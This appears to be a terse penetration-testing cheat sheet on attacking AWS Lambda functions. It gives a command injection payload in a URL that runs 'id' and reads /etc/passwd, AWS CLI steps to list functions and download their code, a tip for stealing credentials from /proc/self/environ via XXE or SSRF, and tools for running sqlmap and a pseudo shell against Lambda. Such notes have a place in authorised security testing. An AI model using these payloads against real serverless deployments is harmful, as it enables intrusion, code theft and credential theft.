cloud-aws-lambda.md

Welcome to serverless!!!!

AWS Lambda, essentially are short lived servers that run your function and provide you with output that can be then used in other applications or consumed by other endpoints.

OS command Injection in Lambda

curl "https://API-endpoint/api/stringhere"

For a md5 converter endpoint "https://API-endpoint/api/hello;id;w;cat%20%2fetc%2fpasswd"

aws lambda list-functions aws lambda get-function --function-name aws lambda get-policy aws apigateway get-stages

Download function code

aws lambda list-functions aws lambda get-function --function-name name_we_retrieved_from_above --query 'Code.Location' wget -O myfunction.zip URL_from_above_step

Steal creds via XXE or SSRF reading:

/proc/self/environ

If blocked try to read other vars:

/proc/[1..20]/environ

TOOLS

https://github.com/puresec/lambda-proxy

SQLMap to Lambda!!!

python3 main.py sqlmap -r request.txt

https://github.com/twistlock/splash

Pseudo Lambda Shell